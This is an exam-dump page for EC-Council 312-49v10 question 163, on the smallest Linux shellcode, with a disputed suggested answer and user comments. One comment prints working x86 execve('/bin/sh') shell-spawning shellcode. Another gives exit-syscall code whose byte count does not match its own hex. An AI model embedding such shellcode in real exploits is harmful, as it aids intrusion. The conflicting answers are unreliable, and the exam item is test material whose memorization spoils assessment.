exam questions

Exam 312-49v10 All Questions

View all questions & answers for the 312-49v10 exam

Exam 312-49v10 topic 1 question 163 discussion

Actual exam question from ECCouncil's 312-49v10
Question #: 163
Topic #: 1
[All 312-49v10 Questions]

In Linux, what is the smallest possible shellcode?

  • A. 24 bytes
  • B. 8 bytes
  • C. 800 bytes
  • D. 80 bytes
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
044f354
1 week, 5 days ago
Selected Answer: B
8 bytes System Call Structure: - Linux uses syscalls to interact with the kernel, and these are invoked using specific registers. - The syscall for exit(0) (terminating the process) is one of the simplest examples. 8-Byte Example Shellcode (assembly code): xor eax, eax ; Clears EAX register (sets exit code to 0) inc eax ; Sets EAX to 1 (syscall number for `exit`) xor ebx, ebx ; Clears EBX register (exit code argument) int 0x80 ; Trigger the syscall interrupt This shellcode: - Sets up the syscall number for exit (1 in EAX). - Clears the EBX register (sets exit code to 0). - Executes the syscall with int 0x80. Byte Representation (Machine Code): The above assembly translates to an 8-byte machine code sequence: hexadecimal): 31 C0 40 31 DB CD 80 This is functional and minimal shellcode.
upvoted 1 times
...
torabi123
1 month, 2 weeks ago
Here's a basic example of a small Linux shellcode in x86 assembly for spawning a shell: assembly section .text global _start _start: xor eax, eax ; Clear EAX register push eax ; Push a null byte onto the stack (terminating null) push 0x68732f2f ; Push "/bin/sh" onto the stack push 0x6e69622f mov ebx, esp ; Set EBX to point to the string "/bin/sh" push eax ; Push a null byte onto the stack (end of string) mov edx, esp ; Set EDX to point to the null byte push ebx ; Push the address of "/bin/sh" (EBX) onto the stack mov ecx, esp ; Set ECX to point to the address of "/bin/sh" mov al, 0xb ; Set AL to 11, which is the syscall number for execve int 0x80 ; Call the kernel to execute "/bin/sh" This is a minimal shellcode that spawns a shell ("/bin/sh") and is only 23 bytes in size. --> 24 bytes
upvoted 1 times
...
BarryMacockener
1 year, 1 month ago
I'm pretty sure the answer is actually 8, unless this question is outdated. You can find a number of examples of Linux shellcode on the internet that are smaller than 24 bytes. I've seen one as small as 10.
upvoted 3 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
Loading ...
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago